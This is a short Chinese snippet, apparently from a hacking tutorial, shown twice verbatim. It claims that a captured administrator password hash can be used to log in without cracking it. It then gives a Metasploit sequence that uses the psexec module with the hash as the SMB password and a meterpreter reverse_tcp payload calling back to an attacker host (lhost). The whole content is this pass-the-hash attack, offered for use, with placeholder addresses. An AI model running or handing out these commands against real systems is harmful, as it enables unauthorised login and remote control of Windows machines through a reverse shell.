抓到管理员的密码hash根本不用破解,直接就可以登录。
1 2 3 4 5 6 7 8 9 10 11 12 13 | use windows/smb/psexec set SMBUser username set SMBPass 用户密码的hash值 set payload Windows/meterpreter/reverse_tcp set rhost 333.333.333.333 set lhost 111.111.111.111 exploit |
抓到管理员的密码hash根本不用破解,直接就可以登录。
1 2 3 4 5 6 7 8 9 10 11 12 13 | use windows/smb/psexec set SMBUser username set SMBPass 用户密码的hash值 set payload Windows/meterpreter/reverse_tcp set rhost 333.333.333.333 set lhost 111.111.111.111 exploit |